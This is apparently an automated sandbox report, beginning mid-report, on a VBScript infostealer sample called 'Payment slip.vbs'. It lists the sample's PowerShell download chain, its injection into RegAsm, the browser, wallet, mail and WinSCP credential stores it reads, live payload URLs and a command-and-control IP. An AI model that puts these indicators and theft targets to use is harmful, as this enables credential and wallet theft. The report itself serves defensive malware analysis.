                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Discord Token Stealer
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty#
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q/C:\Users\user\AppData\Roaming\Ethereum\keystore
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus4
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q;C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                Source: RegAsm.exe, 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: powershell.exe, 00000002.00000002.1978194693.00007FF887DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Tries to harvest and steal Bitcoin Wallet information
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Discord Token Stealer
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts41
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		1
                DLL Side-Loading                		211
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Credentials in Registry                		34
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information                		Security Account Manager131
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Command and Scripting Interpreter                		Login HookLogin Hook3
                Software Packing                		NTDS1
                Process Discovery                		Distributed Component Object Model1
                Clipboard Data                		3
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets51
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items51
                Virtualization/Sandbox Evasion                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1608231 Sample: Payment slip.vbs Startdate: 06/02/2025 Architecture: WINDOWS Score: 100 25 s3-w.us-east-1.amazonaws.com 2->25 27 s3-1-w.amazonaws.com 2->27 29 4 other IPs or domains 2->29 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 15 other signatures 2->51 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 61 VBScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 67 2 other signatures 9->67 12 powershell.exe 7 9->12         started        process6 signatures7 69 Suspicious powershell command line found 12->69 71 Found many strings related to Crypto-Wallets (likely being stolen) 12->71 73 Suspicious execution chain found 12->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 12->75 15 powershell.exe 14 23 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 33 raw.githubusercontent.com 185.199.110.133, 443, 49709 FASTLYUS Netherlands 15->33 35 bitbucket.org 185.166.143.48, 443, 49707 AMAZON-02US Germany 15->35 37 s3-w.us-east-1.amazonaws.com 52.217.123.233, 443, 49708 AMAZON-02US United States 15->37 39 Writes to foreign memory regions 15->39 41 Injects a PE file into a foreign processes 15->41 43 Loading BitLocker PowerShell Module 15->43 21 RegAsm.exe 3 15->21         started        signatures10 process11 dnsIp12 31 172.81.130.34, 49711, 49712, 7702 DATAWAGONUS United States 21->31 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->53 55 Tries to steal Mail credentials (via file / registry access) 21->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 21->57 59 3 other signatures 21->59 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Payment slip.vbs17%VirustotalBrowse
                Payment slip.vbs13%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
                https://ofice365.github.io/1/test.jpg100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		52.217.123.233
                		truefalse
                  		high
                  bitbucket.org
                  		185.166.143.48
                  		truefalse
                    		high
                    raw.githubusercontent.com
                    		185.199.110.133
                    		truefalse
                      		high
                      bbuseruploads.s3.amazonaws.com
                      		unknown
                      		unknownfalse
                        		high
                        90.156.5.0.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113false
                            		high
                            https://raw.githubusercontent.com/richie213/36k/refs/heads/main/IAmdgfd.txtfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000004.00000002.1594966229.000001BE21DEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/14436606/23354RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://github.com/mgravell/protobuf-netJRegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://ofice365.github.io/1/test.jpgpowershell.exe, 00000002.00000002.1926563968.000001C02EE6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594867297.000001BE20210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FF90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594908002.000001BE20245000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594380828.000001BE1FFA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://discordapp.com/api/v9/users/RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/mgravell/protobuf-netRegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bbuseruploads.s3.amazonaws.com/15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-powershell.exe, 00000004.00000002.1594966229.000001BE21DEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brRegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.org/products/firefoxRegAsm.exe, 00000006.00000002.1619760521.0000000003480000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1619760521.000000000349B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://github.com/mgravell/protobuf-netiRegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://stackoverflow.com/q/11564914/23354;RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stackoverflow.com/q/2152978/23354RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.cookielaw.org/powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://icanhazip.com/RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://steamcommunity.com/profiles/RegAsm.exe, 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aui-cdn.atlassian.com/powershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1594966229.000001BE21DEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1926563968.000001C02E8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1926563968.000001C02E934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1926563968.000001C02E96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://bitbucket.orgpowershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            185.166.143.48
                                                                                                            		bitbucket.orgGermany
                                                                                                            		16509AMAZON-02USfalse
                                                                                                            52.217.123.233
                                                                                                            		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                            		16509AMAZON-02USfalse
                                                                                                            172.81.130.34
                                                                                                            		unknownUnited States
                                                                                                            		27176DATAWAGONUSfalse
                                                                                                            185.199.110.133
                                                                                                            		raw.githubusercontent.comNetherlands
                                                                                                            		54113FASTLYUSfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1608231
                                                                                                            Start date and time:2025-02-06 11:22:03 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 6m 31s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:9
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:Payment slip.vbs
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.spre.troj.spyw.expl.evad.winVBS@8/8@4/4
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 50%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 88%
                                                                                                            • Number of executed functions: 290
                                                                                                            • Number of non-executed functions: 14
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .vbs
                                                                                                            • Stop behavior analysis, all processes terminated

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 976 because it is empty
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            05:23:04API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                            05:23:18API Interceptor33x Sleep call for process: RegAsm.exe modified

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                                                            • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                                                            185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
